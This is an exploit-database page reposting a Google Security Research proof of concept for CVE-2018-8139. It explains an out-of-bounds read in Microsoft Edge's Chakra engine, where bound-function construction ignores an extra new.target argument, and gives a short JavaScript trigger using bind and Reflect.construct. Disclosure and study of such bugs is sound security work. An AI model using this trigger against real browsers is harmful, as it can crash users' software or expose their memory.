[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read Exploit

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30707
Category
dos / poc
Date add
12-07-2018
CVE
CVE-2018-8139
Platform
windows
/*
BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument (new.target in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.
 
PoC:
*/
 
function func() {
    new.target.x;
}
 
let bound = func.bind({}, 1);
 
Reflect.construct(bound, []);

#  0day.today [2024-11-04]  #